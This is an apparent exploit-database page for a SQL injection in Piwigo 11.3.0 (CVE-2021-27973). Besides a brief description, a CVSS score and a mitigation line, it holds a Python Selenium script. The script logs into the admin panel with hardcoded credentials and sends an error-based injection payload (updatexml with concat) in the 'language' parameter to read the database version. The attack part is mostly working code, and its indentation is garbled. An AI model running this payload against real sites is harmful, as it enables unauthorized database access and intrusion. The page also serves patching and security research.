header-logo
Suggest Exploit
vendor:
Piwigo
by:
nu11secur1ty
7.2
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Piwigo
Affected Version From: 11.3.0
Affected Version To: 11.3.0
Patch Exists: Yes
Related CWE: CVE-2021-27973
CPE: a:piwigo:piwigo:11.3.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2021

Piwigo 11.3.0 – ‘language’ SQL

This exploit allows an attacker to inject malicious SQL code into the 'language' parameter of the Piwigo 11.3.0 web application. By exploiting this vulnerability, an attacker can gain access to the application's database and potentially execute arbitrary code.

Mitigation:

To mitigate this vulnerability, users should upgrade to the latest version of Piwigo and ensure that all input is properly sanitized and validated.
Source

Exploit-DB raw data:

# Exploit Title: Piwigo 11.3.0 - 'language' SQL
# Author: @nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 04.30.2021
# Vendor: https://piwigo.org/
# Link: https://github.com/Piwigo/Piwigo/releases/tag/11.3.0
# CVE: CVE-2021-27973

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug: @nu11secur1ty
# CVE-2021-27973

from selenium import webdriver
import time


#enter the link to the website you want to automate login.
website_link="http://192.168.1.3/piwigo/"

#enter your login username
username="admin"

#enter your login password
password="password"

#enter the element for username input field
element_for_username="username"

#enter the element for password input field
element_for_password="password"

#enter the element for submit button
element_for_submit="login"

print("Loading... ;)")
time.sleep(1)
browser = webdriver.Chrome()
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Languages Exploit
time.sleep(5)
browser.get(("
http://192.168.1.3/piwigo/admin.php?page=languages&language=TR_CN%27%20or%20updatexml(1%2Cconcat(0x7e%2C(version()))%2C0)%20or%20%27&action=activate"))

print("The payload for category Languages is deployed...\n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

Navigation

Suggest Exploit

Services By CQR